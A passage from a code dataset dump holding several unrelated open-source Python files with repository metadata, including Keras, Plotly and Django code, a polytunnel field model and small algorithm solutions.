tf.expand_dims(image, axis=-1)\n image = tf.repeat(image, repeats=[3],axis=-1)\n images.append(aug(image,label)[0])\n # plt.imshow(image,cmap=\"gray\")\n # plt.show()\n\nplot_image_grid(images)","repo_name":"nunna-m/KidneyTumorClassification","sub_path":"ktc/old_files/visualize_aug.py","file_name":"visualize_aug.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409570631","text":"def do_trick(inf):\n\tfirst = []\n\tsecond = []\n\tr1 = int(inf.readline())\n\tfor i in xrange(1, 5):\n\t\ts = inf.readline().strip()\n\t\tif (i == r1):\n\t\t\tfirst += s.split()\n\tr2 = int(inf.readline())\n\tfor i in xrange(1, 5):\n\t\ts = inf.readline().strip()\n\t\tif (i == r2):\n\t\t\tsecond += s.split()\n\tres = set(first) & set(second)\n\tif len(res) == 1:\n\t\treturn list(res)[0]\n\telif len(res) == 0:\n\t\treturn \"Volunteer cheated!\"\n\telse:\n\t\treturn \"Bad magician!\"\n\n\ninf = 
open(\"in.txt\", 'r')\nt = int(inf.readline())\nres = \"\"\nfor i in xrange(0, t):\n\tres += \"Case #\" + str(i + 1) + \": \" + do_trick(inf) + \"\\n\"\noutf = open(\"out.txt\", 'w')\noutf.write(res)\noutf.close()\n\t\n\t\t\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1033.py","file_name":"1033.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38094667863","text":"import numpy as np\nimport tensorflow as tf\nfrom keras import Sequential\n\nfrom models.base_model import BaseModel\n\n\nclass NeuralNet(BaseModel):\n \"\"\"Neural network model built using TensorFlow Keras and optimizer Adam.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.model: Sequential = None\n\n def fit(self, X_train, y_train, layers, validation_split=0.2, epochs=200):\n \"\"\"Train the neural network on data X_train and targets y_train.\n\n Args:\n X_train: Input data for training\n y_train: Target values for training\n layers: List of layer widths\n validation_split: Validation set fraction of training data\n epochs: Number of training epochs\n \"\"\"\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Input(shape=(X_train.shape[1],)))\n\n for layer_size in layers:\n model.add(tf.keras.layers.Dense(layer_size, activation=\"relu\", kernel_initializer=\"he_normal\",\n ))\n\n output_dim = 1 if np.ndim(y_train) == 1 else y_train.shape[1]\n model.add(tf.keras.layers.Dense(output_dim, kernel_initializer=\"he_normal\",\n ))\n\n model.compile(optimizer=\"adam\", loss=\"mse\")\n\n model.fit(\n X_train,\n y_train,\n validation_split=validation_split,\n epochs=epochs,\n verbose=1,\n )\n\n self.model = model\n\n # Extract weights and biases\n self.weights = [layer.get_weights()[0] for layer in model.layers]\n self.biases = [-layer.get_weights()[1] for layer in model.layers]\n\n def resume_training(self, X_train, y_train, initial_epoch=0, epochs=200, validation_split=0.2):\n self.model.fit(\n X_train,\n y_train,\n validation_split=validation_split,\n initial_epoch=initial_epoch,\n epochs=epochs,\n verbose=0,\n )\n\n # Extract weights and biases\n self.weights = [layer.get_weights()[0] for layer in self.model.layers]\n self.biases = [-layer.get_weights()[1] for layer in self.model.layers]\n","repo_name":"DhiaBou/sampled-networks","sub_path":"models/neural_net.py","file_name":"neural_net.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22439688320","text":"import pandas as pd\nimport plotly.graph_objs as go\nimport plotly as py\nimport config\n\npe_mmvb = pd.read_csv(r'app\\static\\tables\\funds2.csv', delimiter=';', decimal=',', parse_dates=True, dayfirst=True, index_col=0, encoding='latin1')\n\ntrace_pe_mmvb_pe = go.Scatter(\n x=pe_mmvb.index,\n y=pe_mmvb['PE_PE'],\n showlegend=True,\n name='P/E',\n marker=dict(color='orange'),\n yaxis='y1')\n\ntrace_pe_mmvb_consensus = go.Scatter(\n x=pe_mmvb.index,\n y=pe_mmvb['PE_TARGET'],\n showlegend=True,\n name='P/E consensus',\n marker=dict(color='teal'),\n yaxis='y1')\n\ndata = [trace_pe_mmvb_pe, trace_pe_mmvb_consensus]\n\nlayout = go.Layout(title='P/E индекса ММВБ-10',\n font=dict(size=config.LAYOUT_FONT_SIZE),\n legend=dict(\n orientation='h'\n ),\n xaxis=dict(tickformat='%m.%y', dtick=\"M1\"),\n width=config.STOCKS_2_WIDTH,\n height=config.STOCKS_2_HEIGHT,\n margin=config.MARGINS\n )\n\nfig = go.Figure(data=data, 
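
`NeuralNet.fit` in the sampled-networks record above stores each layer's kernel and (negated) bias after training. A minimal sketch of that extraction on a toy model, mirroring the wrapper's own `Sequential`/`Input` construction; the bias negation is that wrapper's own convention, so it is skipped here (assumes TensorFlow is installed; exact Keras APIs vary somewhat by version):

```python
import numpy as np
import tensorflow as tf

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(4,)))
model.add(tf.keras.layers.Dense(3, activation="relu"))
model.add(tf.keras.layers.Dense(1))
model.compile(optimizer="adam", loss="mse")
model.fit(np.random.rand(32, 4), np.random.rand(32, 1), epochs=1, verbose=0)

# Each Dense layer's get_weights() returns [kernel, bias]
for i, layer in enumerate(model.layers):
    kernel, bias = layer.get_weights()
    print(f"layer {i}: kernel {kernel.shape}, bias {bias.shape}")
```
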
layout=layout)\nconfig={'showLink': False}\npy.offline.plot(fig, filename=r'app\\templates\\pe_mmvb.html', auto_open=False, config=config)","repo_name":"ogladkov/oofr_research","sub_path":"pe_mmvb.py","file_name":"pe_mmvb.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30595940544","text":"from . import models\nfrom rest_framework import generics, permissions\n\n# Create your views here.\nfrom .serializers import ArticleSerializer\n\n\nclass ArticlesListView(generics.ListAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.AllowAny,)\n\n\nclass ArticleDetailView(generics.RetrieveAPIView):\n serializer_class = ArticleSerializer\n\n def get_queryset(self):\n user = self.kwargs[\"user\"]\n return models.Article.objects.filter(user=user)\n\n\nclass ArticleCreateView(generics.CreateAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass ArticleEditView(generics.RetrieveUpdateAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_queryset(self):\n user = self.request.user\n return models.Article.objects.filter(author=user)\n\n\nclass ArticleFilterView(generics.ListAPIView):\n serializer_class = ArticleSerializer\n permission_classes = (permissions.AllowAny, )\n\n def get_queryset(self):\n article_type = self.kwargs[\"article_type\"]\n return models.Article.objects.filter(article_type=article_type,\n article_status=\"published\")\n\n\nclass ArticleDeleteView(generics.RetrieveDestroyAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_queryset(self):\n user = self.request.user\n return models.Article.objects.filter(author=user)\n","repo_name":"PatrickBoynton/news-app","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35612739371","text":"class Node:\n left = right = None\n\n def __init__(self,data):\n self.data = data\n\n\ndef mirror(node):\n '''Mirrors the given binary tree'''\n if node:\n # mirror the left sub tree recursively\n mirror(node.left)\n # mirror the right sub tree recursively\n mirror(node.right)\n # Swap the left and right nodes\n node.left, node.right = node.right, node.left\n\n\ndef in_order_traversal(node):\n '''Visit the nodes using in order traversal'''\n if node:\n in_order_traversal(node.left)\n print(node.data, end=' ')\n in_order_traversal(node.right)\n\n\n# Constructing the tree\nroot = Node(1)\nroot.left = Node(3)\nroot.right = Node(5)\nroot.left.left = Node(7)\nroot.left.right = Node(9)\n\n\nprint('Inorder traversal of the Tree before mirroring: ')\nin_order_traversal(root)\n# 1 3 5 7 9\n\nprint('\\nMirroring the Tree\\n')\nmirror(root)\n\nprint('Inorder traversal of the Tree after mirroring: ')\nin_order_traversal(root)\n# 1 5 3 9 
7","repo_name":"Kalki5/DSA-Assignment","sub_path":"1_mirror_of_binary_tree.py","file_name":"1_mirror_of_binary_tree.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41191753703","text":"import FWCore.ParameterSet.Config as cms\n\nhltDisplacedtktkFilter = cms.EDFilter('HLTDisplacedtktkFilter',\n saveTags = cms.bool(True),\n FastAccept = cms.bool(False),\n MinLxySignificance = cms.double(0),\n MaxLxySignificance = cms.double(0),\n MaxNormalisedChi2 = cms.double(10),\n MinVtxProbability = cms.double(0),\n MinCosinePointingAngle = cms.double(-2),\n triggerTypeDaughters = cms.int32(0),\n DisplacedVertexTag = cms.InputTag('hltDisplacedtktkVtx'),\n BeamSpotTag = cms.InputTag('hltOnlineBeamSpot'),\n TrackTag = cms.InputTag('hltL3MuonCandidates'),\n mightGet = cms.optional.untracked.vstring\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"HLTrigger/btau/hltDisplacedtktkFilter_cfi.py","file_name":"hltDisplacedtktkFilter_cfi.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18809232163","text":"import exceptions\nfrom vehicle import Vehicle\n\n\nclass Plane(Vehicle):\n cargo = 10\n max_cargo = int\n\n def __init__(self, weight=None, fuel=None, fuel_consumption=None, max_cargo=100):\n super().__init__(weight, fuel, fuel_consumption)\n self.max_cargo = max_cargo\n\n def load_cargo(self, value):\n cargo_total = self.cargo + value\n if cargo_total <= self.max_cargo:\n self.cargo = cargo_total\n else:\n raise exceptions.CargoOverload()\n\n def remove_all_cargo(self):\n cargo_before = self.cargo\n self.cargo = 0\n return cargo_before\n","repo_name":"victorfomenko/ml","sub_path":"hw-2/plane.py","file_name":"plane.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20928298367","text":"\nimport mesa\nimport math \nimport random \nimport numpy\n\nfrom shapely.geometry import Point, Polygon\nfrom shapely.affinity import translate,rotate \n\nfrom pickers_model.strawberry_field.topological_map import TMNode,TMEdge,TopologicalMap\n\nclass PolytunnelRow : \n \n def __init__( self, polytunnel, i ): \n \n self.polytunnel = polytunnel\n self.i = i\n self.assigned_pickers = [] \n self.fruit_yield = self.polytunnel.fruit_yield \n self.length = self.polytunnel.length\n \n self.nodes = [] \n \n #Portion picked -- as pickers pick, the value goes up. Starts at 0.0, ends with 1.0. 
\n self.fruit_picked = 0.0 \n self.fruit_picked_portion = 0.0 \n \n self.entrance_xy_point = None \n self.end_xy_point = None \n \n self.entrance_node = None\n \n def pick( self, amount ): \n \n self.fruit_picked += amount\n self.fruit_picked_portion = self.fruit_picked / self.fruit_yield \n if self.fruit_picked >= self.fruit_yield:\n self.fruit_picked = self.fruit_yield \n self.fruit_picked_portion = 1.0 \n \n def add_nodes( self, topological_map, number_of_nodes = 50 ): \n entrance_x,entrance_y = self.entrance_xy_point.x,self.entrance_xy_point.y\n end_x, end_y = self.end_xy_point.x,self.end_xy_point.y\n points = zip ( numpy.linspace( entrance_x, end_x, number_of_nodes ), numpy.linspace( entrance_y, end_y, number_of_nodes ) )\n \n self.nodes = [ TMNode( px,py ) for px,py in points ]\n self.entrance_node = self.nodes[0] \n for n in self.nodes:\n topological_map.add_node( n )\n \n for n0,n1 in zip( self.nodes, self.nodes[1:] ):\n topological_map.add_edge( n0,n1 )\n \n def find_picking_node( self ):\n \n #Find picking point\n entrance_x,entrance_y = self.entrance_xy_point.x,self.entrance_xy_point.y\n end_x,end_y = self.end_xy_point.x,self.end_xy_point.y\n #print( 'Entrance: ', entrance_x,entrance_y, 'End:', end_x,end_y )\n x = entrance_x + self.fruit_picked_portion * ( end_x - entrance_x ) \n y = entrance_y + self.fruit_picked_portion * ( end_y - entrance_y )\n \n #Find closest node\n closest_node = self.nodes[ 0 ] \n shortest_distance = math.sqrt( ( closest_node.pos_x - x )**2 + ( closest_node.pos_y - y )**2 ) \n for n in self.nodes: \n #print( 'Looking for a closer node. Current: ', closest_node.pos_x,closest_node.pos_y, 'Wanted: ',x,y, 'n', n.pos_x, n.pos_y)\n new_distance = math.sqrt( ( n.pos_x - x )**2 + ( n.pos_y - y )**2 )\n if new_distance < shortest_distance:\n #print( 'Found a closer node' )\n shortest_distance = new_distance\n closest_node = n\n return closest_node\n\nclass Polytunnel : \n \n def __init__( self, lower_left, length, width, angle = 0, number_of_rows = 6, entrance_side = \"NORTH\", fruit_yield = 1000 ):\n \n self.lower_left = lower_left # (x,y) coordinates of the lower left corner\n\n self.length = length\n self.width = width \n self.angle = angle\n \n self.fruit_yield = fruit_yield \n \n # \n ll_x, ll_y = lower_left \n\n coords = ( ( ll_x, ll_y ), ( ll_x, ll_y + width), ( ll_x + length, ll_y + width ), ( ll_x + length, ll_y ), ( ll_x, ll_y ) )\n p = Polygon( coords )\n self.polygon = rotate( p, self.angle, origin = lower_left, use_radians = True )\n b = self.polygon.boundary.coords\n\n #entrance coordinates\n # NOTE! The whole polytunnel was previously treated as having one entrance.\n # Now, we have an entrance to each row. 
\n entrance_x = ll_x + length/2\n if entrance_side == \"NORTH\": \n entrance_y = ll_y + width + 1 \n polygon_entry_line_endpoints = ( b[1] , b[2] )\n polygon_end_line_endpoints = ( b[-1] , b[-2] )\n else:\n entrance_y = ll_y -1\n polygon_entry_line_endpoints = ( b[-1] , b[-2] )\n polygon_end_line_endpoints = ( b[1] , b[2] )\n\n e = Point( entrance_x, entrance_y )\n self.entrance_point = rotate( e, self.angle, origin = lower_left, use_radians = True ) \n self.entrance_point_node = None \n\n # Create rows \n self.number_of_rows = number_of_rows \n entry_corner1,entry_corner2 = polygon_entry_line_endpoints\n entry_line_array = numpy.linspace( entry_corner1, entry_corner2, num= 2*self.number_of_rows+1)\n entry_points = entry_line_array[ 1::2 ]\n end_corner1,end_corner2 = polygon_end_line_endpoints\n end_line_array = numpy.linspace( end_corner1, end_corner2, num= 2*self.number_of_rows+1)\n end_points = end_line_array[ 1::2 ] \n \n assert( len( entry_points ) == self.number_of_rows )\n assert( len( end_points ) == self.number_of_rows )\n \n self.list_of_rows = [] \n for r in range( number_of_rows ): \n new_r = PolytunnelRow( self, r )\n new_r.entrance_xy_point = Point( entry_points[r] )\n new_r.end_xy_point = Point( end_points[r] )\n self.list_of_rows.append( new_r )\n\n # Create entrance to each row. \n \n #Arbitrary point is a point in the polytunnel used for testing. \n self.arbitrary_point = None \n self.arbitrary_point_node = None \n \n self.points_in_polytunnel = [ ] # a list of points, used in creating a topological map\n self.points_in_polytunnel_nodes = [ ] # nodes corresponding to the points \n\n self.ll_longitude = None\n self.ll_latitude = None\n self.lr_longitude = None\n self.lr_latitude = None\n\n if self.angle==0:\n self.xmin = ll_x\n self.xmax = ll_x + length\n self.ymin = ll_y\n self.ymax = ll_y + width\n self.mesa_space = mesa.space.ContinuousSpace( self.xmax, self.ymax, False, self.xmin, self.ymin )\n #self.mesa_space = mesa.space.SingleGrid( self.xmax, self.ymax, False, self.xmin, self.ymin )\n else:\n xmin, ymin, xmax, ymax = self.polygon.bounds\n self.xmin = xmin\n self.xmax = ymin\n self.ymin = xmax\n self.ymax = ymax\n \n def position_in_polytunnel_simple( self, position ): \n x, y = position\n if angle!=0:\n raise(\"Object at an angle!\")\n return not( x < self.xmin or x >= self.xmax or y < self.ymin or y >= self.ymax )\n \n def position_in_polytunnel_mesa( self, position ): \n if angle!=0:\n raise(\"Object at an angle!\")\n return not ( self.mesa_space.out_of_bounds( position ) ) \n\n def position_in_polytunnel_geometry( self, position ):\n return self.polygon.contains( Point ( position ) )\n\n def position_in_polytunnel( self, position ):\n return self.position_in_polytunnel_geometry( position )\n\n def get_coordinates_list( self ):\n return list( self.polygon.boundary.coords )\n \n def move_xy( self, move_by_x, move_by_y ): \n old_x, old_y = self.lower_left\n new_x = old_x + move_by_x \n new_y = old_y + move_by_y\n self.lower_left = new_x, new_y\n\n self.polygon = translate( self.polygon, move_by_x, move_by_y )\n self.entrance_point = translate( self.entrance_point, move_by_x, move_by_y ) \n \n for r in self.list_of_rows:\n r.entrance_xy_point = translate( r.entrance_xy_point, move_by_x, move_by_y )\n r.end_xy_point = translate( r.end_xy_point, move_by_x, move_by_y )\n\n def rotate_shapely( self, angle, origin = (0,0), use_radians=True ):\n\n self.angle += angle\n self.polygon = rotate( self.polygon, angle, origin = origin, use_radians = use_radians )\n\n xmin, ymin, 
xmax, ymax = self.polygon.bounds\n self.xmin = xmin\n self.xmax = ymin\n self.ymin = xmax\n self.ymax = ymax\n\n point = rotate( Point(self.lower_left), angle, origin = origin, use_radians = use_radians )\n self.lower_left = point.x, point.y\n e = rotate( self.entrance_point, angle, origin = origin, use_radians = use_radians )\n self.entrance_point = e \n \n for r in self.list_of_rows:\n r.entrance_xy_point = rotate( r.entrance_xy_point, angle, origin = origin, use_radians = use_radians )\n r.end_xy_point = rotate( r.end_xy_point, angle, origin = origin, use_radians = use_radians )\n\n def add_random_point( self ): \n \n ll_x, ll_y = self.lower_left \n arbitrary_point_x = ll_x + random.randint( 0, math.floor( self.length ) ) \n arbitrary_point_y = ll_y + random.randint( 0, math.floor( self.width ) ) \n # ap = Point( arbitrary_point_x, arbitrary_point_y ) \n # self.arbitrary_point = rotate( ap, self.angle, origin = lower_left, use_radians = True ) \n \n self.points_in_polytunnel.append( ( arbitrary_point_x, arbitrary_point_y ) ) \n","repo_name":"FrankIvankovic/TaskAssigner","sub_path":"pickers_model/strawberry_field/polytunnel.py","file_name":"polytunnel.py","file_ext":"py","file_size_in_byte":9080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4792311911","text":"from django.urls import path, include\nfrom django.conf.urls import url\n\nfrom . import views\napp_name = 'oficina'\nurlpatterns = [\n path('', views.index, name='index'), \n path('register/', views.register, name='register'),\n path('produtos/', views.produtos, name='produtos'),\n path('produtos/new/', views.novo_produto, name='novo_produto'),\n path('produtos/delete/<int:id>/', views.apagar_produto, name='apagar_produto'),\n path('produtos/update/<int:id>/', views.atualizar_produto, name='atualizar_produto'),\n path('produtos/validar/', views.validar_descricao_produto, name='validar_descricao_produto'),\n #####################################\n path('fornecedores/', views.fornecedores, name='fornecedores'),\n path('fornecedores/new', views.novo_fornecedor, name='novo_fornecedor'),\n path('fornecedores/delete/<int:id>/', views.apagar_fornecedor, name='apagar_fornecedor'),\n path('fornecedores/edit/<int:id>/', views.atualizar_fornecedor, name='atualizar_fornecedor'),\n #######################################\n path('clientes/', views.clientes, name='clientes'),\n path('clientes/new', views.novo_cliente, name='novo_cliente'),\n path('clientes/edit/<int:id>/', views.atualizar_cliente, name='atualizar_cliente'),\n path('clientes/delete/<int:id>/', views.apagar_cliente, name='apagar_cliente'),\n #######################################\n path('servicos/', views.servicos, name='servicos'),\n path('servicos/new', views.novo_servico, name='novo_servico'),\n path('servicos/delete/<int:id>/', views.apagar_servico, name='apagar_servico'),\n path('servicos/edit/<int:id>/', views.atualizar_servico, name='atualizar_servico'),\n #######################################\n path('vendas/', views.vendas, name='vendas'),\n path('vendas/detail/<int:orcamento_id>/', views.detail_orcamento, name='detail_orcamento'), \n path('orcamentos/', views.orcamentos, name='orcamentos'),\n path('orcamentos/delete/<int:id>/', views.apagar_orcamento, name='apagar_orcamento'),\n path('orcamentos/edit/<int:id>/', views.atualizar_orcamento, name='atualizar_orcamento'),\n path('vendas/new', views.nova_venda, name='nova_venda'), \n path('vendas/add/item/<int:orcamento_id>/', views.novo_item, 
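
`PolytunnelRow.find_picking_node` above interpolates the picking position along the row, then linearly scans the precomputed nodes for the closest one. The same lookup vectorised with NumPy; the coordinates are made up, and array endpoints in `linspace` need NumPy 1.16 or later:

```python
import numpy as np

entrance = np.array([0.0, 0.0])
end = np.array([10.0, 0.0])
picked_portion = 0.37  # fraction of the row already picked

nodes = np.linspace(entrance, end, 50)          # 50 evenly spaced row nodes
target = entrance + picked_portion * (end - entrance)

dists = np.linalg.norm(nodes - target, axis=1)  # distance to every node
closest = nodes[np.argmin(dists)]
print(closest)  # the node nearest to 37% of the way along the row
```
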
name='novo_item'),\n path('vendas/delete/item/<int:orcamento_id>/<int:id>/', views.apagar_item, name='apagar_item'),\n path('vendas/edit/item/<int:orcamento_id>/<int:id>/', views.atualizar_item, name='atualizar_item'),\n path('vendas/finish/<int:orcamento_id>/', views.finalizar_venda, name='finalizar_venda'),\n]\n","repo_name":"hugovinicius145/oficina","sub_path":"oficina/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5699960886","text":"def solution(a, b, g, s, w, t):\n answer = -1\n start = 0\n # 옮겨야 할 금,은 양 => 2 * 10^9 / 한번에 옮길 수 있는 양 => 1 / 걸리는 시간 2 * 10^5 (왕복)\n end = 4 * int(1e9) * int(1e5)\n # 이분탐색으로 최적 시간을 찾는다\n answer = end\n while start <= end:\n mid = (start + end) // 2\n gold, silver, total = 0, 0, 0\n for i in range(len(g)):\n time = t[i]\n round_time = time * 2 # 왕복\n cnt = mid // round_time # 시간 만큼 옮길 수 있는 총 횟수\n # 즉, 운반횟수를 늘릴지 판단(편도이므로 이를 기준삼는다)\n if mid % round_time >= time:\n cnt += 1\n # 보유량과 왕복으로 옮기는 총량 중 최소값\n gold += min(g[i], w[i] * cnt)\n silver += min(s[i], w[i] * cnt)\n total += min(g[i] + s[i], w[i] * cnt) # 총량\n # 총량을 통해서도 옮길 수 있는 광물 총합과 신도시 건설 시 필요한 총합과 안맞을 수 있기 때문에 필요함\n # 각 기준보다 크면 시간을 줄이고\n if gold >= a and silver >= b and total >= a + b:\n end = mid - 1\n answer = min(answer, mid)\n # 작으면 시간을 늘린다.\n else:\n start = mid + 1\n\n return answer\n","repo_name":"wnstj-yang/Algorithm","sub_path":"Programmers/programmers_금과 은 운반하기.py","file_name":"programmers_금과 은 운반하기.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72702515394","text":"import os\nimport uuid\n\nfrom django.conf import settings\nfrom django.contrib.auth.signals import user_logged_out\nfrom django.dispatch import receiver\nfrom django.contrib import messages\nfrom django.contrib.auth.models import AbstractBaseUser, BaseUserManager\nfrom django.db import models\nfrom django.utils.deconstruct import deconstructible\nfrom django.db.models import Q\n\nfrom projects.models import Projects\nfrom api.models import ObjectType\nfrom django.utils.translation import gettext_lazy as _\nfrom geopy.geocoders import Nominatim\nimport re\n\nUSER_TYPE = [\n ('user', \"User\"),\n ('engineer', \"Engineer\"),\n ('government', \"Government\"),\n ('project_admin', \"Project Admin\"),\n ('admin', \"Admin\"),\n]\n\nBASIC_USER_TYPE = [\n ('user', \"User\"),\n ('project_admin', \"Project Admin\")\n]\n\nPROJECT_ADMIN_ADDABLE_USER_TYPE = [\n ('user', \"User\"),\n ('engineer', \"Engineer\"),\n ('project_admin', \"Project Admin\"),\n]\n\n@deconstructible\nclass PathAndRename(object):\n def __init__(self, sub_path):\n self.path = sub_path\n\n def __call__(self, instance, filename):\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid.uuid4().hex, ext)\n return os.path.join(self.path, filename)\n\npath_and_rename = PathAndRename(\"user_images\")\n\n# USER LOGOUT SIGNAL (Shows is_active=False users a special message)\n@receiver(user_logged_out)\ndef post_logout(sender, user, request, **kwargs):\n if user and not user.is_anonymous and not user.active and not settings.TESTING:\n messages.success(request, 'User Account has been Disabled. 
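# ---- Illustrative sketch (added; not part of the original source) ----
# The solution above is the classic "binary search on the answer" pattern:
# feasibility is monotone in the candidate time, so the smallest feasible
# value can be found by bisecting the range. Generic form of that pattern:
def min_feasible(lo, hi, feasible):
    """Smallest x in [lo, hi] with feasible(x) True; feasible must be monotone."""
    answer = hi
    while lo <= hi:
        mid = (lo + hi) // 2
        if feasible(mid):
            answer = min(answer, mid)
            hi = mid - 1       # feasible: try a smaller value
        else:
            lo = mid + 1       # infeasible: need a larger value
    return answer

# e.g. the first integer whose square reaches 1000:
assert min_feasible(0, 10**6, lambda x: x * x >= 1000) == 32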
Please contact ISAC-SIMO Admin.')\n\nclass UserManager(BaseUserManager):\n def create_user(self, email, password=None, user_type='user', is_active=True, full_name=None):\n if not email:\n raise ValueError(_(\"Users must have email address\"))\n if not password:\n raise ValueError(_(\"Users must have password\"))\n else:\n user_obj = self.model(\n email=self.normalize_email(email)\n )\n user_obj.set_password(password) #change password\n user_obj.user_type = user_type\n user_obj.active = is_active\n user_obj.full_name = full_name if full_name else email\n user_obj.save(using = self._db)\n return user_obj\n\n def create_staffuser(self, email, password=None):\n staff_user = self.create_user(\n email,\n password = password,\n user_type = 'user'\n )\n return staff_user\n\n def create_superuser(self, email, password=None):\n super_user = self.create_user(\n email,\n password = password,\n user_type = 'admin'\n )\n return super_user\n\nclass User(AbstractBaseUser):\n email = models.EmailField(_(\"Email\"),max_length=255, unique=True)\n full_name = models.CharField(_(\"Full Name\"), max_length=255, blank=True, null=True)\n active = models.BooleanField(_(\"Active\"),default=True) #can login\n user_type = models.CharField(_(\"User Type\"), max_length=50, choices=USER_TYPE, default='user')\n is_staff = models.BooleanField(_(\"Is Staff\"), default=False)\n timestamp = models.DateTimeField(_(\"Timestamp\"), auto_now_add = True)\n image = models.ImageField(_(\"Image\"), upload_to=path_and_rename, default='user_images/default.png', blank=True)\n projects = models.ManyToManyField('projects.Projects', verbose_name=_(\"Projects\"), blank=True, related_name='users')\n # USER IS LINKED TO PROJECT WITH m2m AND USER CAN UPLOAD IMAGE FOR SPECIFIC PROJECT\n # AND VIEW THE IMAGES EITHER ADDED BY THIS USER -OR- BELONGS TO THIS USERS m2m PROJECTS\n created_by = models.ForeignKey(\"main.User\", related_name='children', verbose_name=_(\"Created By\"),\n on_delete=models.SET_NULL, blank=True, null=True)\n\n USERNAME_FIELD='email'\n REQUIRED_FIELDS = []\n\n objects = UserManager()\n\n def __str__(self):\n str = self.full_name or ''\n if str:\n str = str + ' - '\n\n str = str + (self.email or '(no email)')\n return str\n \n def get_full_name(self):\n return self.full_name\n\n def get_project_list(self):\n if self.visible_projects:\n return \"<br/> \".join(list(map(lambda x: '⮞ '+x.project_name, self.visible_projects)))\n else:\n return \"<br/> \".join(list(map(lambda x: '⮞ '+x.project_name, self.projects.all())))\n \n def get_project_json(self, request):\n projects = []\n project_list = []\n if request and request.user and not request.user.is_anonymous and request.user.id:\n project_list = self.projects.all()\n else:\n project_list = Projects.objects.filter(guest=True)\n\n for project in project_list:\n projects = projects + [{\n 'id': project.id,\n 'project_name': project.project_name,\n 'project_desc': project.project_desc\n }]\n return projects\n\n def get_object_detect_json(self, request):\n objects = []\n url = \"\"\n if request:\n url = request.scheme + '://' + request.META['HTTP_HOST']\n # TODO: probably in future we will not get all() objects below\n # We probably will get request.GET.get('project_id') which will be coming for each project specific mobile app\n # So we need to filter ObjectType with this project e.g. 
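# ---- Illustrative sketch (added; not part of the original source) ----
# PathAndRename above is the usual @deconstructible "upload_to callable":
# it keeps the original extension but replaces the name with a uuid4 hex so
# uploads cannot collide or leak the client's filename. The helper name
# below is a hypothetical stand-in for the same logic outside Django:
import os
import uuid

def renamed(sub_path, filename):
    ext = filename.split('.')[-1]
    return os.path.join(sub_path, '{}.{}'.format(uuid.uuid4().hex, ext))

path = renamed('user_images', 'portrait.final.PNG')
assert path.startswith('user_images') and path.endswith('.PNG')
assert len(os.path.basename(path)) == 32 + 1 + 3   # 32 hex chars + '.' + ext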
ObjectType.objects.filter(project=project_id).order_by('created_at').all()\n\n object_types = []\n # IF Logged in user return all linked Projects Object types\n if request and request.user and not request.user.is_anonymous and request.user.id:\n projects = Projects.objects.filter(users__id=request.user.id)\n object_types = ObjectType.objects.filter(Q(created_by=request.user) | Q(project__in=projects)).order_by('name').all()\n # If Lat Lng available (e.g. from mobile app) filter by country\n if request.GET.get(\"lat\", None) and request.GET.get(\"lng\", None):\n try:\n geolocator = Nominatim(user_agent=\"ISAC-SIMO-Smart-Location\")\n location = geolocator.reverse([request.GET.get(\"lat\"), request.GET.get(\"lng\")])\n if location:\n country_code = location.raw['address']['country_code'].upper()\n object_types = list(filter(lambda obj: not obj.countries or country_code in (list(map(lambda obj: obj.code, obj.countries))), object_types))\n except Exception as e:\n print(e)\n print(\"Failed to Get Location for: \" + request.GET.get(\"lat\") + \",\" + request.GET.get(\"lng\"))\n # Else if Guest user return object type for projects marked as Guest=True\n else:\n projects = Projects.objects.filter(guest=True)\n object_types = ObjectType.objects.filter(Q(project__in=projects)).order_by('name').all()\n\n for o in object_types:\n image = None\n default_image = True\n if o.image:\n image = url + str(o.image.url)\n default_image =True if \"default.jpg\" in image else False\n\n objects = objects + [{\n 'id': o.id,\n 'name': o.name.title(),\n 'instruction': o.instruction if o.instruction else \"\",\n 'image': image,\n 'default_image': default_image,\n 'countries': list(map(lambda x: x.code, o.countries)),\n 'verified': o.verified,\n 'aspect': [2, 2],\n 'project': o.project.project_name,\n }]\n return objects\n\n def get_hidden_email(self):\n email = self.email\n if(len(email.split('@')[0]) >= 3):\n return email[0:3] + re.sub(r'[^@.]', '*', email)[2:-3] + 